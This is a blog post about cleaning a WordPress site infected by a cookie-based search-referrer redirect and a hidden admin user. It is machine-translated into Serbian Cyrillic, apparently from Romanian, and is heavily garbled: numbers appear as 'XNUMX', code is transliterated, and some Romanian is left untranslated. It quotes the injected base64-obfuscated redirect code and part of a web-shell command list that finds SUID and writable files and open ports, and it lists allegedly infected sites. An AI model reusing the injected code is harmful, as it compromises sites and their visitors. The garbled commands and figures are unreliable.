Вирус блогосфера ... али ја сам имао?!

У последњих месец дана, ја сам добио упозорење Вирус блог у неким посетилаца. У почетку сам игнорисао упозорења, јер сам инсталирао јако добар антивирус (Касперски АВ КСНУМКС) И мада блог за дуго времена, никада нисам добио вирус алерт (.. сам видео нешто сумњиво раније да је прва нестала рефресх ... Коначно.).
Полако је почела да се појављују велике варијације посетилац саобраћајНакон што је саобраћај у последње време стално пао и почео да се све више и више људи који ми говоре да стеалтхсеттингс.цом је вирусед. Јуче сам добио од некога сцреенсхот ради када антивирусни блокиран скрипта стеалтхсеттингс.цом:Тројан-Цлицкер.ХТМЛ.ИФраме.гр. Било је прилично убедљив за мене, да сам ставио све изворе претресли. Прва идеја која ми је на памет је да се уради надоградња најновија верзија WordPress (КСНУМКС), али не пре него стара скрипта да избришете све фајлове ВордПресс и да Бацкуп базе података. Ова процедура није дала никакве резултате и вероватно би требало дуго времена да каже где је Буба, ако то није рекао у разговору уз кафу, он је нашао Гоогле и било би добро да га видим.
МиДигиталЛифе.инфо, објавио је чланак под насловом "ВордПресс Пијук: Спасавање и поправити и Гоогле претраживача или Не Цоокие промета преусмеравају-Неедс.инфо, АниРесултс.Нет, златно-Инфо.нет и других илегалних сајтова"То је крај нит сам морао.
Ради се о експлоатисати ВордПресс основу колачића, Што мислим да је веома сложен и направио књигу. Паметна довољно да СКЛ Ињецтион База података у блогу, да створи невидљиву корисника једноставна рутинска провера Kontrolna tabla->Корисници, проверите директоријуме сервера и датотеке "вритабле" (Са цхмод КСНУМКС), да траже и извршити датотеке са привилегијама роот корисника или групе. Ја не знам ко искористи име и видим да има неколико чланака о њему, упркос чињеници да су многе заражене блогове, укључујући и Румунију. Ок ... ја ћу покушати да објасним генералним о вирусу.

Шта је вирус?

Прво, убаците изворне странице на блогове, невидљиве везе за посетиоце већ видљив и индексираних претраживачима, нарочито Гоогле. Овако пренос ранг на сајтовима наглашавају нападача. Друго, један је уметнут Код де редирецтионаре УРЛ за посетиоце који долазе из Гоогле-а, Ливе, Иахоо, ... или РСС читач, а не сајт колачић. Антивирус детектује као преусмеравање Тројан-Цлицкер.ХТМЛ.

Симптоми:

Масивни пад посетилаца саобраћају, Посебно на блоговима, где већина посетилаца долази из Гоогле-а.

Идентификација: (Отуда је постао проблем за оне који не знају како да пхпМиАдмин, ПХП и Линук)

ЛА. ПАЖЊА! Прво направите резервну базу података!

КСНУМКС. Проверите изворне датотеке индек.пхп, хеадер.пхп, фоотер.пхп, Блог тему и види да ли постоји код који користи шифровање басеКСНУМКС или садржи "ако (СРБ $ ==" КСНУМКС && сизеоф ($ _ЦООКИЕ) == КСНУМКС?) "облик:

<? Пхп
$ Сереф ​​= арраи ("Гоогле", "мсн", "живи", "АлтаВиста"
"Питај", "Иахоо", "АОЛ", "ЦНН", "Време", "Алека");
Сер $ = КСНУМКС; иф ($ $ као Сереф ​​Реф)
ако је (стрпос (стртоловер
($ _СЕРВЕР ['ХТТП_РЕФЕРЕР']), $ Реф) == фалсе) {$ сер = "КСНУМКС, пауза;?}!
иф ($ сер == "КСНУМКС && сизеоф ($ _ЦООКИЕ) == КСНУМКС?) {хеадер (" Лоцатион: '.) "хттп://". басеКСНУМКС_децоде ("ИВКСНУМКСцмВздВкКСНУМКСциКСНУМКСуЗКСК = /') излаз;
}>

Или ... нешто. Обриши овај код!

Кликните на слику ...

Индекс код

На слици горе сам изабрао грешком и "<ПХП гет_хеадер ();?>". Тај број би требало да остане.

КСНУМКС. Коришћење пхпМиАдмин и идите на табели базе података вп_усерсКада проверите да ли постоји корисничко име створено на 00:00:00 0000-00-00 (Могући пласман усер_логин пишу "ВордПресс". Писање овог корисника (ИД поље), а затим га избрисати.

Кликните на слику ...

факе корисник

* Цел де пе линиа Верде, Требуие СТЕРС си ретинут ИД-ул луи. У цазул Луи , Фост ИД = КСНУМКС .

КСНУМКС. Мергети у табелул вп_усермета, Унде Требуие СА лоцализати и стергети линије за ИД (гдје поље усер_ид ИД вредност се брише).

КСНУМКС. У табели вп_оптион, Идите на ацтиве_плугинс и видети шта је додатак омогућен осумњиченог. Може се користити као завршетака _олд.гифф, _олд.пнгг, _олд.јпег, _нев.пхп.гифф, итд. комбинације лажних екстензија слика са _олд и _нев.

СЕЛЕЦТ * ФРОМ ВХЕРЕ вп_оптионс оптион_наме = 'ацтиве_плугинс "

Обриши овај плугин, онда идите на блогу -> Контролна табла програмера -> Плугинс, који активирају и деактивирају одређени додатак.

Кликните на слику да би је изгледа ацтиве_плугинс вируса фајл.

повезати

Пратите стазу на ФТП или ССХ, назначену у ацтиве_плугинс и обришите фајл са сервера.

КСНУМКС. Тот у пхпМиАдмин, у табелул вп_оптион, Нађи и обришите линију која садржи "rss_f541b3abd05e7962fcab37737f40fad8"Си рандул"интернал_линкс_цацхе ".
У интернал_линкс_цацхе, сунт пусе Кодировка, веза уриле де-спам заштита апар у блогу СИ УН Код де Гоогле АдСенсе, Ал хацкерулуи.

КСНУМКС. Рецомандат есте са ва сцхимбати парола де Логаре пе блог Си Са Елиминати Тоате усереле суспецте. Надоградња на најновију верзију ВордПресс-а и подесите блог да не дозволи регистрацију нових корисника. Нема губитак ... не могу да коментаришу и нелогично.

Покушао сам горе да објасним колико, шта да радим у таквој ситуацији да очистим блог од овог вируса. Проблем је много гори него што се чини и чак није ријешен јер се користи сигурносних пропуста Але вебсерверулуи де Хостинг, пе брига есте блогул.

Прима де ца Машура могао сецуризаре, Царе Ау Прилазни ССХ, Са фаца цатева верифицари пе сервер пентру ведеа Даца мај екиста фисиере. де генул * _олд * си * _Нев * Цу терминатииле..гифф, јпег,.. пнгг,. јпгг. Ацесте фисиере. требуиесц стерсе. Даца реденумим ун фисиер, де екс. топ_ригхт_олд.гифф in топ_ригхт_олд.пхпВидимо да фајл је управо екплоит кода серверу.

Неки корисни савети за проверу, чишћење и обезбеђивање сервера. (преко ССХ)

1. цд / тмп и проверите да ли постоје фолдери као тмпВФлма или друге комбинације има исто име и да га избришете. Погледајте на слици испод, два фолдера таква од мене:

тмпсервер

рм-рф имефасцикле

КСНУМКС. Проверите елимиати (цхмод промене) као могућа директоријума атрибута цхмод КСНУМКС

пронаћи све могуће писати фајлове у тренутни режија: Нађи. -Тип Ф-Перм-КСНУМКС-Лс
пронаћи све могуће писати директоријуме струја режија: Нађи. -Тип Д-Перм-КСНУМКС-Лс
пронаћи све могуће писати директоријуме и датотеке у тренутни режија: Нађи. -Перм-КСНУМКС-Лс

КСНУМКС. У потрази за сумњивим датотекама на серверу.

Нађи. -Наме "* _нев.пхп *"
Нађи. -Наме "* _олд.пхп *"
Нађи. -Наме "* Јпгг."
Нађи. -Наме "* _гифф"
Нађи. -Наме "* _пнгг"

4, ПАЖЊА! фајлове који су постављени мало СУИД si СГИД. Ове датотеке извршава са привилегијама корисника (група) или корена, а не корисник који извршава датотеку. Ови фајлови могу довести до корена компромис, уколико безбедносна питања. Ако користите фајлове са Суид и СГИД бита, обавља 'цхмод КСНУМКС " или деинсталирате пакет који садржи их.

Искористити садржи негде у извору ...:

иф ($ сафе_моде!) {
иф ($ ос_типе == 'пази') {
$ Ос = Изврши ('сисцтл-Н керн.остипе');.
$ Ос = Изврши ('сисцтл-Н керн.осрелеасе');.
$ Ос = Изврши ('сисцтл-Н кернел.остипе');.
$ Ос = Изврши ('сисцтл-Н кернел.осрелеасе');.
иф (емпти ($ корисник)) = $ корисник изврши ('ид');
$ Псевдонимов = арраи (
"=>",
"Пронађи Суид датотеке '=>' финд /-типе ф-Перм-КСНУМКС-лс ',
"Пронађи сгид датотеке '=>' финд /-типе ф-Перм-КСНУМКС-Јел ',
"Пронађи све могуће писати фајлове у тренутни дир '=>' наћи. -Тип Ф-Перм-КСНУМКС-лс ',
"Пронађи све могуће писати директоријуме струја дир '=>' наћи. -Тип Д-Перм-КСНУМКС-Јел ',
"Пронађи све могуће писати директоријуме и датотеке у тренутни дир '=>' наћи. -Перм-КСНУМКС-Јел ',
'Схов отвори луке' => 'нетстат-| греп-и слушај',
);
} Елсе {
. $ Ос_наме = Изврши ('Вер');
Корисник $ = Изврши ('ецхо% име% ").;
$ Псевдонимов = арраи (
"=>",
"Види рунинг услуге '=>' нет старт '
"Покажи процес лист '=>' тасклист '
);
}

На овај начин ... у основи налази повреде у безбедности. Луке отвара директоријуме "вритабле" и група извршних датотека / роот привилегије.

Назад са више ...

Неки блогови инфицирани: , ,

, , ,
ввв.разванматасел.ро,

блог.хрмаркет.ро, ввв.нитза.ро,
мотоцицлете.мотомаг.ро,

еми.браиниент.цом, ввв.пицсел.ро,

,
, ввв.итек.ро / блог,
ввв.радиологи.ро,

ввв.дипсе.ро/ионут/,
ввв.винул.ро/блог/, ввв.дамаидепарте.ро,

, Ввв.артистул.ро / блог /,

ввв.мирабилисмедиа.ро / блог, Блог.еинвест.ро
... Списак се наставља ... много.

Можете да проверите да ли је блог вируса, помоћу Гоогле претраживача. Цопи & Пасте:

Сајт ввв.блегоо.цом буи

Лаку ноћ и повећати на посао ;) Ускоро ћу доћи до исправке на Еугена превезибил.импревизибил.цом.

БРБ :)

ДА: ПАЖЊА! Промена УордПресс тема или надоградњу на ВордПресс КСНУМКС, није решење да се отараси овог вируса.

Вирус блогосфера ... али ја сам имао?!

О аутору

Потајно

Страствени о свему што значи гадгет и ИТ, са задовољством пишем на стеалтхсеттингс.цом са КСНУМКС-а и волим да откривам нове ствари о рачунарима и мацОС-у, Линук оперативним системима, Windows, иОС и Андроид.

Оставите коментар